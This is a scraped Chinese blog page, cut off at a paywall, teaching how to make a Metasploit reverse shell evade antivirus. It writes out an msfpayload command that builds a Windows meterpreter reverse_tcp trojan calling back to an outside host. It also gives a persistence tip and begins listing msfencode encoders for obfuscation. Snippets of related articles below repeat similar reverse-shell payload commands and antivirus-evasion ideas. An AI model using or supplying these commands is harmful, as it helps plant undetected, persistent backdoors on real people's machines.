Metasploit reverse Shell的免杀(炊少教学)

最新推荐文章于 2024-06-05 15:16:35 发布
最新推荐文章于 2024-06-05 15:16:35 发布
阅读量327 收藏
点赞数
分类专栏: 工具使用 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weiliang369/article/details/123130498
版权

rootkithat是我以前的马甲 以前写的文章

我们先生成一个X64的WINDOWS XP 的reverse SHELL

1
2

root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/
meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe

提示:你可以用 scheduleme -m 1 -u e /tmp/x64.exe 让你的木马更持久

提交到世界杀毒网

——————————————
8%的杀软(3/37)报告发现病毒,我们来加密他,让他到达免杀的效果
查看metasploit自带的加密模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

root@rootkithat:/opt/framework-3.7.1/msf3# ./msfencode -l 
 Framework
Encoders==================  Name Rank Description ---- ----
----------- cmd/generic_sh good Generic Shell Variable Substitution
Command Encoder cmd/ifs low Generic ${IFS} Substitution Command
Encoder cmd/printf_php_mq manual printf(1) via PHP
了解本专栏 订阅专栏 解锁全文 超级会员免费看
信安微凉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Metasploit可执行后门(炊少教学
weiliang369的博客
02-25 102
他能生成LINUX WINDOWS PHP ASP JSP等等的后门哦 msfpayload as shellcode root@Dis9Team:/home/brk# msfpayload -l 他能生成多种多样的 简单的来说一个 正常的Windows后门 :用的是:windows/meterpreter/reverse_tcp msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \ m..
如何进行免杀
hakksjss的博客
05-14 729
0x03 免杀思路总结环境准备:火绒(静态)、360、windowsdef(动态) 免杀的最基本思路就是去除其特征,这个特征有可能是特征码,也有可能是行为特征,只要在不修改其 原有功能的情况下,破坏了病毒与木马所固有的特征,一次免杀就能完成。文件免杀
使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
渗透测试
06-06 7124
文章目录前言一、免杀1.msfvenom的使用2.多重编码二、加壳1.upx的使用总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件 一、免杀 免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描 1.msfvenom的使用 ┌──(root????kali)-[~] └─# msfvenom info
Metasploit——msfvenom免杀木马
热门推荐
迷风小白
07-26 1万+
利用Metasploit中的msfvenom模块生成木马 先来msfvenom命令的参数 Options: -l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt, formats等等 -p, --paylo...
利用metasploit生成反弹shell程序,实现远程控制
qq_33163046的博客
08-20 3931
Metasploit生成反弹shell实现远程控制的方法具有高度定制化、多平台支持、强大的漏洞利用能力、无需事先安装恶意软件以及高度灵活和可扩展等优点。这使得用户能够根据具体需求和目标系统的特点,实现精确、有效和隐蔽的远程控制。
实战shell免杀&C2远控&工具魔改(免杀日记 - 上篇)
guanjian_ci的博客
06-05 1422
1、上面实验内容并不多,但是工具的使用、环境的安装、代码的排错够新手玩上几天了。2、绕过杀毒软件的本质就是防止被杀毒库匹配,代码、工具指纹等等!3、一个好的免杀,一定具备了多方面的性能:防杀软、绕过流量平台、防沙箱、防逆向调试后依然能够正常运行上线!4、此文章分上 、 中 、下,未完待续... ...
Metasploit学习之免杀技术
习惯积淀的博客
01-12 473
文章目录面杀技术使用msf攻击载荷生成器创建可独立运行的二进制文件躲避杀毒软件的检测 面杀技术 使用msf攻击载荷生成器创建可独立运行的二进制文件 msfpayload windows/shell_reverse_tcp O 使用O选项来查看可用的参数 msfpayload windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=31337 X /va...
使用Metasploit 获取远程 shell
KKKmeng的博客
06-08 245
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。
Metasploit——木马免杀
12-01 276
1.生成简单到木马后门 root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp O //查看这个payload有什么选项 root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp LHOST=192.16...
How to use a reverse shell in Metasploit
公众号shadow sock7
05-25 529
参考: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit有两种流行的shell种类:bind和reverse。 bind shell就是在target上开启一个新的服务,需要attacker连接以得到一个session。 reverse shell(也被称为反
metasploit
03-16
常见的payload类型有shellcodeshell代码)、reverse shells(反向shell)和bind shells(绑定shell)。 4. **Shell** 标签中的"Shell"在这里指的是在成功利用漏洞后,攻击者可以获取到的目标系统的命令行界面。...
Metasploit.zip
08-11
Metasploit支持多种类型的Payload,包括shellcodereverse shell等。 4. **会话管理**:一旦成功建立会话,Metasploit可以帮助你控制目标系统,执行命令、上传/下载文件、持久化连接等。 5. **自定义脚本**:...
bypass_360_meterpreter免杀技巧1
08-03
然而,直接使用Meterpreter payload通常会被杀毒软件检测到,因此需要采取免杀措施。 首先,我们需要了解Meterpreter payload的生成过程。在本例中,我们使用MSFvenom创建一个PHP的Meterpreter payload: ```bash ...
Metasploit可执行后门.doc
12-01
Metasploit可执行后门 Metasploit是一款开源的渗透测试框架,提供了一个功能强大且灵活的平台,用于渗透测试和漏洞利用。通过对Metasploit的深入研究和实践,我们可以更好地理解和防御黑客攻击。 1. Metasploit可...
Metasploit渗透测试指南(全) .pdf
12-23
本书会讲解各种payload类型,如shellcode、bind shellreverse shell等,以及如何根据目标环境选择合适的payload。同时,还会涉及编码器的使用,以避开防火墙和反病毒软件的检测。 此外,书中的高级话题可能涵盖...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8354
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
qt练习控件label控件-lineEdit控件样例代码
最新发布
07-30
qt练习控件label控件-lineEdit控件样例代码
【JCR一区级】麻雀搜索算法SSA-CNN-LSTM-Attention故障诊断分类预测【含源码 5689期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Attention分类系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Attention分类 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Attention分类 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Attention分类 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Attention分类 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Attention分类
metasploit 反弹shell
10-16
反弹 shellMetasploit 中的一个常用功能,可以通过它在目标机器上执行命令或者获取目标机器的控制权。具体操作步骤如下: 1. 打开 Metasploit 控制台,输入以下命令: ``` use exploit/multi/handler set ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

信安微凉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值